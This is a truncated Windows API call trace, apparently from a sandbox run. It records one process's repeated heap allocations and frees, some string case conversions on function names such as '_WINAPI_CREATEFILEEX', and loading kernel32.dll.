[0094.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0094.724] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0094.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0094.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0094.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f68 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0094.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0094.724] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0094.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0094.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0094.725] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0094.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0094.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0094.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0094.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0094.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0094.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0094.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0094.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0094.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0094.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0094.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0094.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0094.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0094.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0094.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0094.728] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0094.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0094.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0094.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0094.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0094.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0094.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0094.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0094.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0094.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0094.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0094.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.731] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.734] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0094.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.735] WideCharToMultiByte (in: CodePage=0x0, 